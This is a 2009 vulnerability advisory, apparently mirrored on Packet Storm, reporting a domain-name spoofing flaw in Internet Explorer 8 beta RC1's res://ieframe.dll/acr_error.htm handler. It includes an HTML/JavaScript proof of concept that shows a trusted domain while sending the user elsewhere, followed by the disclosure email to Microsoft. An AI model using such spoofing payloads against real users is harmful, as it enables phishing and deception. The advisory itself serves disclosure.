Internet Explorer 8 beta RC1 has a flaw that allows for domain name spoofing.
18a9e3ecbc14c0c76b54cf49a03ddc3677e5d291ef28940276dc506adef42519###########################################
IE8 beta RC1 res://ieframe.dll/acr_error.htm Spoff
Vendor page: www.microsoft.com
Advisore:http://lostmon.blogspot.com/
2009/03/ie8-beta-rc1-resieframedllacrerrorhtm.html
vendor notify:yes exploit available:yes
############################################
Internet explorer 8 has a flaw that allows remote users to
spooff the domain name in 'ieframe.dll' wen is set to
'acr_error.htm' in res: uri handler a remote user can
compose a Bad link thats shows in domain name for example
google.com , but wen click in the link it goes to other
site (spooffing)
#################
Proof of concept
#################
<html>
<head>
<script type="text/javascript">
function open_win()
{
window.open("res://ieframe.dll/acr_error.htm#
http://www.google.com/,http://Lostmon.blogspot.com","_blank","toolbar=yes,
location=no, directories=no, status=no, menubar=yes, scrollbars=no,
resizable=no, copyhistory=no");
}
</script>
</head>
<title>..:[-IE8 res://ieframe.dll/acr_error.htm Domain name Spoff
-]:..</title>
<body>
<form>
<input type="button" value="Open Window" onclick="open_win()">
</form>
</body>
</html>
#######################################
Thnx To estrella to be my ligth
Thnx to all Lostmon Team
---------- Forwarded message ----------
From: Lostmon lords <lostmon@gmail.com>
Date: 2009/3/4
Subject: ie8 spooff the domain name in ieframe.dll wen is set to
acr_error.htm in res: uri handler
To: Microsoft Security Response Center <secure@microsoft.com>
Hello
Internet explorer 8 has a flaw that allows remote users to spooff the domain
name in ieframe.dll wen is set to acr_error.htm in res: uri handler
a remote user can compose a malicious link thats shows in domain name for
example google.com , but wen click in the link it goes to other site
(spooff)
res://ieframe.dll/acr_error.htm#[trusted domain],[attackers site]
see attached file as a PoC.
res://ieframe.dll/acr_error.htm
I test it in windows 2003 and winxp pro&home with ie 7 and it does not work
it apears that its affects only IE8
Thnx for your time !!!!
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
--
atentamente:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
La curiosidad es lo que hace mover la mente....
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed